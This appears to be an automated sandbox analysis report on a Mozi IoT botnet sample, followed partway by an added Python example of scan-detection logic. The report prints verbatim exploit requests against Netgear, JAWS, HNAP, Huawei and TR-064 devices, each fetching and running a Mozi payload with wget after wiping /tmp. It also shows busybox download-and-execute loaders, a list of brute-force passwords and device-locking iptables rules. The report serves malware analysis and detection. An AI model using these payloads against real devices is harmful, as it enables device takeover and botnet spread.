65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Sample listens on a socket
Source: /tmp/nT7K5GG5km (PID: 4623) Socket: 0.0.0.0::44040 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 173.128.113.111
Source: unknown TCP traffic detected without corresponding DNS query: 151.70.88.212
Source: unknown TCP traffic detected without corresponding DNS query: 37.127.116.2
Source: unknown TCP traffic detected without corresponding DNS query: 73.213.225.252
Source: unknown TCP traffic detected without corresponding DNS query: 164.95.80.124
Source: unknown TCP traffic detected without corresponding DNS query: 3.220.46.172
Source: unknown TCP traffic detected without corresponding DNS query: 65.119.165.128
Source: unknown TCP traffic detected without corresponding DNS query: 159.30.196.217
Source: unknown TCP traffic detected without corresponding DNS query: 112.60.138.223
Source: unknown TCP traffic detected without corresponding DNS query: 54.72.49.99
Source: unknown TCP traffic detected without corresponding DNS query: 159.134.45.88
Source: unknown TCP traffic detected without corresponding DNS query: 169.108.151.225
Source: unknown TCP traffic detected without corresponding DNS query: 46.69.243.160
Source: unknown TCP traffic detected without corresponding DNS query: 159.184.117.36
Source: unknown TCP traffic detected without corresponding DNS query: 45.71.81.134
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.196.152
Source: unknown TCP traffic detected without corresponding DNS query: 187.65.235.163
Source: unknown TCP traffic detected without corresponding DNS query: 133.182.208.68
Source: unknown TCP traffic detected without corresponding DNS query: 105.202.173.103
Source: unknown TCP traffic detected without corresponding DNS query: 192.37.11.14
Source: unknown TCP traffic detected without corresponding DNS query: 128.34.103.41
Source: unknown TCP traffic detected without corresponding DNS query: 65.169.70.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.146.156.163
Source: unknown TCP traffic detected without corresponding DNS query: 96.200.64.71
Source: unknown TCP traffic detected without corresponding DNS query: 122.157.60.54
Source: unknown TCP traffic detected without corresponding DNS query: 99.231.44.225
Source: unknown TCP traffic detected without corresponding DNS query: 88.83.215.123
Source: unknown TCP traffic detected without corresponding DNS query: 112.188.233.56
Source: unknown TCP traffic detected without corresponding DNS query: 106.180.217.144
Source: unknown TCP traffic detected without corresponding DNS query: 177.228.76.105
Source: unknown TCP traffic detected without corresponding DNS query: 196.250.243.57
Source: unknown TCP traffic detected without corresponding DNS query: 80.6.216.131
Source: unknown TCP traffic detected without corresponding DNS query: 151.160.250.99
Source: unknown TCP traffic detected without corresponding DNS query: 141.215.180.231
Source: unknown TCP traffic detected without corresponding DNS query: 18.21.159.227
Source: unknown TCP traffic detected without corresponding DNS query: 53.12.181.226
Source: unknown TCP traffic detected without corresponding DNS query: 72.240.24.193
Source: unknown TCP traffic detected without corresponding DNS query: 168.237.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 60.222.236.176
Source: unknown TCP traffic detected without corresponding DNS query: 45.220.233.11
Source: unknown TCP traffic detected without corresponding DNS query: 54.48.115.122
Source: unknown TCP traffic detected without corresponding DNS query: 65.123.42.165
Source: unknown TCP traffic detected without corresponding DNS query: 188.61.141.250
Source: unknown TCP traffic detected without corresponding DNS query: 189.51.61.124
Source: unknown TCP traffic detected without corresponding DNS query: 99.79.97.187
Source: unknown TCP traffic detected without corresponding DNS query: 82.32.209.151
Source: unknown TCP traffic detected without corresponding DNS query: 111.39.224.122
Source: unknown TCP traffic detected without corresponding DNS query: 54.139.218.167
Source: unknown TCP traffic detected without corresponding DNS query: 218.150.197.195
Source: unknown TCP traffic detected without corresponding DNS query: 111.99.121.168
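Worked example (added here; it is not the report's or the sample's code): the logic behind the two sandbox signatures these lines support, "TCP traffic detected without corresponding DNS query" and "Connects to many ports of the same IP (likely port scanning)", replayed over a constructed connection log. The destination addresses are taken from the list above and the PID 4623 from the socket line; the timestamps, the probed ports, the benign host 203.0.113.10, its hostname update.example.net and the DNS answer are made up for the example, as are the thresholds.

```python
"""The logic behind "TCP traffic detected without corresponding DNS query"
and "Connects to many ports of the same IP", replayed over a constructed log.

Added example, not the report's or the sample's code. Destinations come from
the report's list and the PID from its socket line; timestamps, ports, the
benign host 203.0.113.10 and its DNS answer are made up.
"""
from collections import defaultdict

BOT_PID = 4623
SCAN_TARGETS = [
    "173.128.113.111", "151.70.88.212", "37.127.116.2", "73.213.225.252",
    "164.95.80.124", "3.220.46.172", "65.119.165.128", "159.30.196.217",
    "112.60.138.223", "54.72.49.99", "159.134.45.88", "169.108.151.225",
]
# Connection log as (seconds, pid, dst_ip, dst_port): one port on many hosts,
# then many ports on one host, then a resolved connection from another process.
CONNECTIONS = [(0.2 * i, BOT_PID, ip, 23) for i, ip in enumerate(SCAN_TARGETS)]
CONNECTIONS += [(3.0 + 0.1 * i, BOT_PID, "46.69.243.160", port)
                for i, port in enumerate([21, 22, 23, 80, 443, 2323, 8080, 8443])]
CONNECTIONS += [(10.0, 1201, "203.0.113.10", 443)]
DNS_ANSWERS = {("update.example.net", "203.0.113.10")}  # (name, address) pairs


def connections_without_dns(connections, dns_answers):
    """Destinations contacted although no DNS answer ever returned them.

    Scanners and bots with hard-coded addresses never resolve a name first;
    legitimate clients almost always do.
    """
    resolved = {addr for _, addr in dns_answers}
    return sorted({ip for _, _, ip, _ in connections if ip not in resolved})


def fanout_alerts(connections, window=5.0, threshold=10):
    """Per pid, the largest number of distinct destinations in any
    `window`-second span, reported when it reaches `threshold`."""
    by_pid = defaultdict(list)
    for t, pid, ip, _ in sorted(connections):
        by_pid[pid].append((t, ip))
    alerts = {}
    for pid, events in by_pid.items():
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window forward
            distinct = len({ip for _, ip in events[start:end + 1]})
            if distinct >= threshold:
                alerts[pid] = max(alerts.get(pid, 0), distinct)
    return alerts


def port_sweep_alerts(connections, min_ports=5):
    """(pid, dst_ip) pairs where one process probed min_ports or more ports."""
    ports = defaultdict(set)
    for _, pid, ip, port in connections:
        ports[(pid, ip)].add(port)
    return {key: sorted(p) for key, p in ports.items() if len(p) >= min_ports}


def verdict(connections, dns_answers):
    """Signature names for what the log supports; the first and third are the
    report's own wording, the middle one is this example's."""
    signals = []
    if connections_without_dns(connections, dns_answers):
        signals.append("TCP traffic detected without corresponding DNS query")
    if fanout_alerts(connections):
        signals.append("Connects to many hosts in a short window (likely scanning)")
    if port_sweep_alerts(connections):
        signals.append("Connects to many ports of the same IP (likely port scanning)")
    return signals


if __name__ == "__main__":
    print(len(connections_without_dns(CONNECTIONS, DNS_ANSWERS)), "unresolved destinations")
    print(fanout_alerts(CONNECTIONS), port_sweep_alerts(CONNECTIONS))
    print(verdict(CONNECTIONS, DNS_ANSWERS))
```

The DNS correlation is what separates the bot's traffic from the benign connection: the single resolved destination is dropped, the thirteen unresolved ones remain. The fan-out window and the port threshold are tunables; on a real sensor they are set from a baseline of the host's normal traffic, not from one sample.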
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 112.125.239.197:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 147.46.176.166:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.22.17.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 1.34.1.251:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 46.249.83.253:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.109.201.46:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 89.129.183.215:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 188.106.17.156:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: unknown HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 81.196.113.75:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 01 May 2021 18:05:29 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 287 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at sinusv.fvds.ru Port 80</address></body></html>
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.m
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.m;
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.m;$
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/bin.sh
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: nT7K5GG5km String found in binary or memory: http://127.0.0.1
Source: nT7K5GG5km String found in binary or memory: http://127.0.0.1sendcmd
Source: nT7K5GG5km String found in binary or memory: http://HTTP/1.1
Source: nT7K5GG5km String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: nT7K5GG5km String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: nT7K5GG5km String found in binary or memory: http://purenetworks.com/HNAP1/
Source: nT7K5GG5km String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: nT7K5GG5km String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: nT7K5GG5km String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

Writes HTML files containing JavaScript to disk
Source: /tmp/nT7K5GG5km (PID: 4600) HTML file containing JavaScript created: /usr/networks

System Summary:

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: POST /cdn-cgi/
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample Potential command found: mount -o remount,rw /overlay /
Source: Initial sample Potential command found: mv -f %s %s
Source: Initial sample Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: killall -9 %s
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: POST /%s HTTP/1.1
Source: Initial sample Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample Potential command found: POST /UD/act?1 HTTP/1.1
